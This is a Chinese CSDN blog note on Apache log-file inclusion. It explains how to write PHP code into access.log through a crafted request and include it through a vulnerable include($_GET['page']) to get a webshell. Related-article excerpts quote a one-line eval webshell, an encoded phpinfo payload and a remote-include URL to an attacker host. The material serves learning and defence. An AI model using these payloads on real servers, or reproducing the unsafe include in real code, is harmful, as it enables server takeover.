【文件包含】Apache日志文件包含漏洞

最新推荐文章于 2024-07-08 09:24:04 发布
最新推荐文章于 2024-07-08 09:24:04 发布
阅读量2.4k 收藏 9
点赞数 5
分类专栏: 笔记 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/109728615
版权

某个PHP文件存在本地包含漏洞,缺又无法上传文件,这种情况就跟明明有sql注入漏洞缺注不出数据一样难受,那还有什么方法能够利用呢?如果目标服务器运行环境为Apache,或许还会有一线生机!本文将会讲述在Apache环境中,如何利用包含Apache日志文件漏洞获取WebShell。
Apache运行后一般会生成两个日志文件,这两个文件是access.log(访问日志)和error.log(错误日志),每当我们请求该服务器页面时,Apache就会在日志文件内记录下我们的操作,并写到access.log文件中。如下图:
在这里插入图片描述
看到这里是不是就有些想法了,没错!我们可以请求不存在的url页面,内容写上利用代码<?php phpinfo();?>,就能写入log文件里面,再去包含它,我们就能轻松getshell!但我们必须知道文件的绝对路径才能进行利用,这里不会讲述怎么去获取绝对路径,这本该是渗透过程中信息收集需要做的。知道了大概流程,我们来实践一下!

代码如下:

<?php
if(isset($_GET['page'])){
	include $_GET['page'];	
}
?>

在url中掺入代码
在这里插入图片描述
查看log文件
在这里插入图片描述

发现<>和空格给过滤了,这样是利用不了的,但没有关系,我们用Burp Suite来绕过编码!

在这里插入图片描述
再看看log文件
在这里插入图片描述
发现已经完整的写进了access.log文件里面,现在我们可以进行利用了!
在这里插入图片描述
经过这段分析,我们可以发现apache的路径是重点,最好更改掉默认路径!

小 白 萝 卜
关注
专栏目录
文件包含 (无视后缀)apache日志 远程文件包含 php封装伪协议:
m0_64338210的博客
02-28 354
1.本地文件包含:(无视后缀) 2.远程文件包含 远程包含shellallow_url_include开启 访问: http://目标机ip/index.php?page=http://操作机ip/shell.txt 目标机: 操作机: 3.apache日志文件包含个体get.shell 修改文件 httpd.conf # CustomLog "logs/access.log" common去掉前面这个#号重启 apache 访问http;//127.0.0.1:8
Apache日志文件漏洞
qq_41704336的博客
07-18 271
全球使用最广泛的Web服务器Apache近日被爆出了一个安全漏洞,该漏洞可能导致攻击者控制服务器。 该漏洞包含在mod_rewrite 模块中的do_rewritelog()日志函数中。由于该函数还无法完全过滤写入日志文件中的数据,攻击者可以使用特定的HTTP请求将转义序列注入到日志文件中,即有可能在无需取得管理员授权的情况下是服务器执行任意命令。该漏洞主要影响2.2.x分支,其他分支也有可...
中间件安全Apache常见漏洞
最新发布
Innocence_0的博客
07-08 898
简单介绍一下apache是什么,Apache是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将python等解释器编译到服务器中。ApacheHTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。apache
文件包含——apache日志文件包含shell(四)
Gjqhs的博客
02-28 532
找到并去注释(可能不一样) 各字段分别为:客户端地址、访问者标识、访问者的验证名字、请求时间、请求类型、状态码、发送给客户端的字节数 抓包后如下修改,改完forward执行 ...
文件包含漏洞——关于apache日志文件,session文件包含
m0_55641973的博客
06-10 997
,则会记录在日志中,但是代码中的敏感字符会被浏览器转码,我们可以通过burpsuit绕过编码,就可以把
文件日志包含漏洞
L1ni01
11-16 3471
文件日志包含漏洞 日志包含漏洞原因: 某php文件存在本地文件包含漏洞,但无法上传文件,利用包含漏洞包含Apache(看服务器是Apache还是nginx)日志文件也可以获取WebShell 我们接下来用的服务器是Apache 注意:需要开启apache记录日志功能 访问日志的位置和文件名在不同的系统上会有所差异 apache一般是/var/log/apache/access.log。: nginx的log在/var/log/nginx/access.log和/var/log/nginx/error.log
文件包含漏洞-日志注入
superman66697的博客
08-16 1395
文件包含漏洞是 Web 应用程序中的一种常见漏洞。当应用程序允许用户控制包含在页面上的文件时,攻击者就可以利用这一点来包含恶意文件。这种恶意文件可能包含执行恶意代码,导致各种攻击,如代码执行、数据泄露或其他未授权的行为。日志注入是通过插入恶意数据到应用程序的日志文件来实施的攻击。当这些日志被其他系统或应用程序读取和解析时,攻击者的恶意数据可能会被执行。这通常利用了不安全日志处理机制和文件包含漏洞的组合。
Apache Tomcat 文件包含漏洞(CNVD-2020-10487,对应 CVE-2020-1938)
03-05
CNVD-2020-10487 和 CVE-2020-1938 是同一个安全漏洞的不同命名,这个漏洞被称为“Apache Tomcat 文件包含漏洞”。此漏洞的存在使得攻击者有可能通过精心构造的请求,将恶意代码注入到Tomcat服务器上,从而执行任意...
Apache-Tomcat从文件包含到RCE漏洞原理深入分析1
08-03
2020年2月20日,CNVD(中国国家信息安全漏洞库)公开了一个关于Apache Tomcat的文件包含漏洞,该漏洞被标记为CVE-2020-1938。这个漏洞允许攻击者通过特定的输入,包含并执行Tomcat服务器上webapps目录下的任意文件,...
文件包含漏洞日志利用
GHD_Nidhogg的博客
03-13 1238
Apache日志php文件存在本地文件包含漏洞,但无法上传文件,此时可以找到Apache路径,利用包含漏洞包含Apache日志文件也可以获取WebShell Apache运行后一般默认会生成两个日志文件,这两个文件是access.log(访问日志)和error.log(错误日志),Apache的访问日志文件记录了客户端的每次请求及服务器响应的相关信息。 127.0.0.1 - - [0...
PHP文件包含漏洞 日志
课嗨教育的专栏
11-13 277
一般虚拟主机都有自己独立的日志,是可读可写的 但是UBUNTU默认装的APACHE权限很低,对日志不可读 我们可以包含日志 在这里%3C%3Fphpinfo%28%29%3B%3F%3E这句就是转换过了的<?phpinfo();?>,我们提交 http://www.123.com/%3C%3Fphpinfo%28%29%3B%3F%3E 这样肯定会报出错找不到页面,而一出错就被记在错误日志里了 http://xxx.com/z.php?zizzy=/home/user/www.xxx.
php本地文件包含漏洞,本地文件包含漏洞详解---LFI
weixin_30668061的博客
03-09 1091
1概述文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句就可以调用内部定义的函数。本地包含漏洞PHP中一种典型的高危漏洞。由于程序员未对用户可控的变量进行输入检查,导致用户可以控制被包含的文件,成功利用时可以使web server...
apache 日志
dianfeng138的专栏
12-23 676
apache日志分类      apache日志可分为三种:                        运行时错误日志,访问日志,其他相关插件或模块的运行日志      1.1  apache运行时错误日志:             该日志由指令 ErrorLog   控制, 一般记录apache在启动过程或者运行时的错误      1.2  apache访问日志:  
php包含apache日志上马
Coisini的博客
05-24 529
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 比如还是这句一句话木马 <?eval($_POST[cmd]);?> 到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, fopen打开/home/virtual/www.xx...
漏洞复现篇——文件包含漏洞进阶-日志文件漏洞
爱国小白帽
02-19 1846
日志文件漏洞原理 当某个PHP文件存在本地包含漏洞,而却无法上传正常文件,这就意味这有包含漏洞却不能拿来利用,这时攻击者就有可能会利用apache日志文件来入侵。 Apache服务器运行后会生成两个日志文件,这两个文件是access.log(访问日志)和error.log(错误日志),apache日志文件记录下我们的操作,并且写到访问日志文件access.log之中 例如:http://192...
Apache文件解析漏洞
@小张小张的博客
10-19 2824
Apache解析漏洞 风险级别:高风险 风险描述:Apache在解析文件时当遇到无法识别的扩展名时,将会从后向前解析,直到遇到识别的扩展名为止 风险分析:在控制上传文件时,判断文件名是否是PHP、ASP、ASPX、ASA、CER、ASPX等脚本扩展名,如果是,则不允许上传,防止攻击者上传1.php.rar等扩展名来绕过程序检测,配合解析漏洞,得到webshell; 解析漏洞主要存在于三大WEB服务程序,分别是IIS、NGINX和Apache。 IIS6.0下主要是有两个解析漏洞,一个是目录解析,如/x
日志包含漏洞
qq_51553814的博客
11-03 3237
日志包含漏洞也是ssrf的一种吧,同样服务器没有很好的过滤,或者是服务器配置不当导致用户进入了内网 原理 首先需要开启服务器记录日志功能 在不同的系统,存放日志文件地方和文件名不同 apache一般是/var/log/apache/access.log nginx的log在/var/log/nginx/access.log和/var/log/nginx/error.log 由于访问URL时访问URL时,服务器会对其编码,所以得通过抓包的形式尝试注入 实际运用 先通过/etc/passwd判断是否存在ssrf
Apache HTTP Server日志内终端转义序列命令注入漏洞
weixin_30263073的博客
05-17 184
漏洞版本: Apache Group HTTP Server 2.2.x 漏洞描述: BUGTRAQ ID: 59826 CVE(CAN) ID: CVE-2013-1862 Apache HTTP Server是开源HTTP服务器。 Apache HTTP Server mod_rewrite向日志文件写入数据时,没有过滤不能打印的字符。如果 mod_rewri...
本地文件包含之包含日志获取webshell
WYJ____的博客
08-06 3421
预备知识 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无须再次编写,这种调用文件的过程称为包含。 实验目的 学会包含日志获取webshell 实验工具 浏览器 实验环境 客户机一台 实验步骤 1、访问127.0.0.1/FI/PHP_FI.php?filename=LFI.txt网页显示是文件包含漏洞。 2.浏览器设置代理服务的步骤...
htaccess文件上传漏洞复现
06-11
请注意,.htaccess文件本身并不会造成上传漏洞,它是一种用于配置Apache服务器的文件。我猜测您的问题是如何利用配置错误或者漏洞上传.htaccess文件来实现服务器攻击的。 一些常见的.htaccess文件上传漏洞如下: 1. 目录遍历漏洞: 如果一个服务器上的网站没有正确限制文件上传的目录,攻击者可以上传包含攻击代码的.htaccess文件到网站的某个目录,然后通过访问该目录下的文件来执行攻击代码。 2. 文件名绕过漏洞: 有些服务器在处理上传的文件名时可能会忽略.htaccess后缀,因此攻击者可以上传包含攻击代码的.htaccess文件并将其命名为其他文件类型的后缀名,例如.php、.jpg、.gif等,然后通过访问该文件来执行攻击代码。 3. MIME类型绕过漏洞: 攻击者可以上传一个包含攻击代码的.htaccess文件,并在其中设置MIME类型为可执行文件,这样当服务器处理该文件时就会将其作为可执行文件来执行其中的代码。 请注意,这些漏洞都是由于服务器配置错误或者漏洞造成的,因此最好的解决方法是及时更新服务器软件并开启安全防护措施,例如限制上传文件的类型、大小、目录等。同时,还应该定期检查服务器配置和日志来发现潜在的安全问题。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值